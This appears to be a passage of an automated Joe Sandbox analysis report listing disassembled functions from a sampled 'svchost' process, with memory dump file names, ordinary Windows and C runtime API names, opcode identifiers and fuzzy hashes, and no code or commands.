                                      Function 00007FF669AA26C8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Clientswprintf
                                      • String ID:
                                      • API String ID: 3322643685-0
                                      • Opcode ID: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                      • Instruction ID: 808ed0c293a353b4ed624aa01181373f93c1000431f6441eab5a5ce14ec0ab9f
                                      • Opcode Fuzzy Hash: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                      • Instruction Fuzzy Hash: 3B011E24A0C38AC2FF598F52A65437976F1AF86B80F044039DD4D8B795DF6CE996C340
                                      Function 00007FF669ABA244 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                      • Instruction ID: d778dbd899859176821ba5c6039b13fbdc7e6f9575cab863e14618d02e5a8cda
                                      • Opcode Fuzzy Hash: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                      • Instruction Fuzzy Hash: C0017C61B04B49C1EB048F4AA94406AB7B0BB99FD0B584135CF4C97325CE38E9418384
                                      Function 00007FF669ABE4C0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF669ABE515,?,?,?,?,00007FF669AB4ADA,?,?,?,00007FF669AB4A66), ref: 00007FF669ABE4C4
                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF669ABE4D7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                      • Instruction ID: dd2124dd55d5dda05de024731006f3d941ffb6867ff75b6f71154509a61434a4
                                      • Opcode Fuzzy Hash: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                      • Instruction Fuzzy Hash: E3E09B61B14586C6DF598F59C4505E973F2BFC4B40F848136E90AC7A18EE3DE5458740
                                      Function 00007FF669AD1C40 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1173176844-0
                                      • Opcode ID: f6116ca8ed12e0ee62487a4090934beebc7853c266b3c9a4a7aff1ced35f567e
                                      • Instruction ID: b795e9a77e18a8fd5e0c105ec261ad710b7a825e96ae56fc2ccb59370d61f81a
                                      • Opcode Fuzzy Hash: f6116ca8ed12e0ee62487a4090934beebc7853c266b3c9a4a7aff1ced35f567e
                                      • Instruction Fuzzy Hash: F2E04290E5D10BC2FA6C3EA215AA1B931F04F59775E185B30DE7D8D3D2EE1CB49A8114
                                      Function 00007FF669ADC7D8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 485612231-0
                                      • Opcode ID: 5a10646ee943ef7144f57a8345da5bff8981a15ab22cb0347333ea4b4f2ec185
                                      • Instruction ID: 5cbbf7d6c91f75745abd383e3490b39499f3e96dd3a340d220f721b5d5a20599
                                      • Opcode Fuzzy Hash: 5a10646ee943ef7144f57a8345da5bff8981a15ab22cb0347333ea4b4f2ec185
                                      • Instruction Fuzzy Hash: EDE0EC51E49647C2FF19AFB2A8151B932F1AF89F84F449034DD1DCE352EE2CA58A4650
                                      Function 00007FF669AC0F90 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 626f1d99765ef93fb9430353de88c01b1606786676b14069a367784bf1b81d0d
                                      • Instruction ID: ab5be18ae0a376460ab6b9535f94032450ce18167238d901701516631fbc04f1
                                      • Opcode Fuzzy Hash: 626f1d99765ef93fb9430353de88c01b1606786676b14069a367784bf1b81d0d
                                      • Instruction Fuzzy Hash: 49816A62706A86D6EE088F65D5941BCB2B1FB41F94F544235DF6D8F685CF38E4A48304
                                      Function 00007FF669AAE148 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 78f6368587f03bef3d7ba744f1fd3c00229f5652d6eb29a9b4a921bea2e0f9a6
                                      • Instruction ID: 9fa5e0fe9a3159719205a6bd4583c3c4cf4f816e3c504ccbd1da4f85616d294f
                                      • Opcode Fuzzy Hash: 78f6368587f03bef3d7ba744f1fd3c00229f5652d6eb29a9b4a921bea2e0f9a6
                                      • Instruction Fuzzy Hash: C6518D62A08686D2EA509F25D4443FD37F1EB95BC8F540136EE8C4B79ADF2DE589C310
                                      Function 00007FF669ABA008 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: LoadString$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2323602097-0
                                      • Opcode ID: c6c7bb94e0bcd877edc742b3384d85ce57f69d0859602b709a7750edba58c5e1
                                      • Instruction ID: 98179f92d913be1c6e9585c8ed8a5e6fb075419f158ea5950e7ab850fc90057a
                                      • Opcode Fuzzy Hash: c6c7bb94e0bcd877edc742b3384d85ce57f69d0859602b709a7750edba58c5e1
                                      • Instruction Fuzzy Hash: 00516B72A08B8AC1EB548F14E48017977F2FB89794F504236DE4D8B7A9DF2CE585C740
                                      Function 00007FF669AADC48 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1011579015-0
                                      • Opcode ID: 0e84e94db4bb831982cd11884855e073d7e48c6337ad4e9e8e688b4001914b2f
                                      • Instruction ID: cbd0263e787cdf751912feb7e4adff36a8a29595a091c4c33861d52470ad9a00
                                      • Opcode Fuzzy Hash: 0e84e94db4bb831982cd11884855e073d7e48c6337ad4e9e8e688b4001914b2f
                                      • Instruction Fuzzy Hash: 53514E62A08686C3EB609F29D4853BD73F1FB95B88F440236EE8D9B6A5DF2CD441C340
                                      Function 00007FF669AB0BA0 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: f1619690963c536cc8c4f625a427be0e20c1c8abacfa75dfd7eb843acbb32b79
                                      • Instruction ID: 134863ea0218da79aeaf8e1947c65e4f4b8d35a42130b17cacd4d20fb466ebed
                                      • Opcode Fuzzy Hash: f1619690963c536cc8c4f625a427be0e20c1c8abacfa75dfd7eb843acbb32b79
                                      • Instruction Fuzzy Hash: 8A41B262B18A9582EA149E17EA4437AB2F1FB85BC0F548435EE4C8BF9EDF7CD4518300
                                      Function 00007FF669AB7F20 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: a58617b45bac9171122bee061166508e831c9b9e82cc24bfa4501852497e3f4d
                                      • Instruction ID: 3c782eea4a4177bd344d84a78bdabd8780c8b00de09c64dddab1c9f02b03f322
                                      • Opcode Fuzzy Hash: a58617b45bac9171122bee061166508e831c9b9e82cc24bfa4501852497e3f4d
                                      • Instruction Fuzzy Hash: B131E2B2B04A8EC2DE14DF5A954457AA3F5AB58BD4F10C132EE5D8B799EE3CE081C300
                                      Function 00007FF669AA96DC Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c0a220b38828d9883135ae7b326b06384b2289c20122941ee104f53db1899794
                                      • Instruction ID: 434f911cfbdbe85b2145bba34afd41a5a1b112ec090256e1484200f96172c9bf
                                      • Opcode Fuzzy Hash: c0a220b38828d9883135ae7b326b06384b2289c20122941ee104f53db1899794
                                      • Instruction Fuzzy Hash: 0A41BE66F18652C6FB109F65A9413AD36F0AF88BA8F444131EE4D9BB85DE39D486C310
                                      Function 00007FF669AB2314 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 299e3fe2d611fb4018d5bac0f52dac5701642bc7e50f7ce273f0a9961b288a36
                                      • Instruction ID: baaae843fece17e07183fcc113844bddb927c9c55a7e3a783f5af5e2371a0064
                                      • Opcode Fuzzy Hash: 299e3fe2d611fb4018d5bac0f52dac5701642bc7e50f7ce273f0a9961b288a36
                                      • Instruction Fuzzy Hash: F9410322A18B4AC0EA249F25E14537D33F0EB55BD8F141636EE5D8BB9DDF3DE4828200
                                      Function 00007FF669ADAD38 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: HandleModule$AddressFreeLibraryProc
                                      • String ID:
                                      • API String ID: 3947729631-0
                                      • Opcode ID: 11d68ba45937298fce3814947d5fe6ffabb0b5f45f2f40c7a1c6d355e3c54dc1
                                      • Instruction ID: a03f664f0bb03522501ea70fec533da432051258587d4f7a650937b619edc7b5
                                      • Opcode Fuzzy Hash: 11d68ba45937298fce3814947d5fe6ffabb0b5f45f2f40c7a1c6d355e3c54dc1
                                      • Instruction Fuzzy Hash: B5419C21A18A52C2FB649F64985027932F2BF95B54F50413ADE4EDF792DF3DEA48C380
                                      Function 00007FF669AA12C0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 680105476-0
                                      • Opcode ID: 29d7b9534cfb09c2d7b869dd861db1df4d8ba4138f2e55af9f39605554c0b9c9
                                      • Instruction ID: 8a7fe0c073f3121d603277eea5f7a909bdc0de59c69c28f4e9cd4bb8e03f44b9
                                      • Opcode Fuzzy Hash: 29d7b9534cfb09c2d7b869dd861db1df4d8ba4138f2e55af9f39605554c0b9c9
                                      • Instruction Fuzzy Hash: F8219021A08795D3EA549F92A44027972E0EB05BF0F690B31DE7D8BBC5DE7CE4914344
                                      Function 00007FF669AE018C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 1153f8908c183356b825f64be31e414c271fdaac26bc6ca5d5e0ef742709c68a
                                      • Instruction ID: e11e6330a4a523f2416a891672067a3d11e34399256d18633f91da94ae7da39f
                                      • Opcode Fuzzy Hash: 1153f8908c183356b825f64be31e414c271fdaac26bc6ca5d5e0ef742709c68a
                                      • Instruction Fuzzy Hash: 11113232A1D692C6EB549F54A88063AB2F4FF85380F550534EF8DCF79ADE2CE9409B40
                                      Function 00007FF669AA45C4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 532136dcd1d542e9fe237077e8594a9c0df01694eefb6674f4b3ddc290915011
                                      • Instruction ID: 4dfbd76c3788d26be728ffeef98020c8de1eddbc9d8900ddf4790a35b21fde7f
                                      • Opcode Fuzzy Hash: 532136dcd1d542e9fe237077e8594a9c0df01694eefb6674f4b3ddc290915011
                                      • Instruction Fuzzy Hash: 1701E162E186C682EA249B28E44123D33F1FFC9794F405331EE9C4BB96EF6CE0448700
                                      Function 00007FF669AA2380 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ClassName
                                      • String ID:
                                      • API String ID: 1191326365-0
                                      • Opcode ID: c11b8f1c6216ca56f5b8f4aeb06c3e143bcfeb0edb37238df8e3ac888e37dffd
                                      • Instruction ID: 32b74732e0a314aec4eaddf1cd62e2cd2b3a7281abe101d121665eb142743a1d
                                      • Opcode Fuzzy Hash: c11b8f1c6216ca56f5b8f4aeb06c3e143bcfeb0edb37238df8e3ac888e37dffd
                                      • Instruction Fuzzy Hash: 93018422B18A8581EB508F52E6953BA73B0FF98BC8F444135DE4D8BB55DF3CE1988740
                                      Function 00007FF669AB3244 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
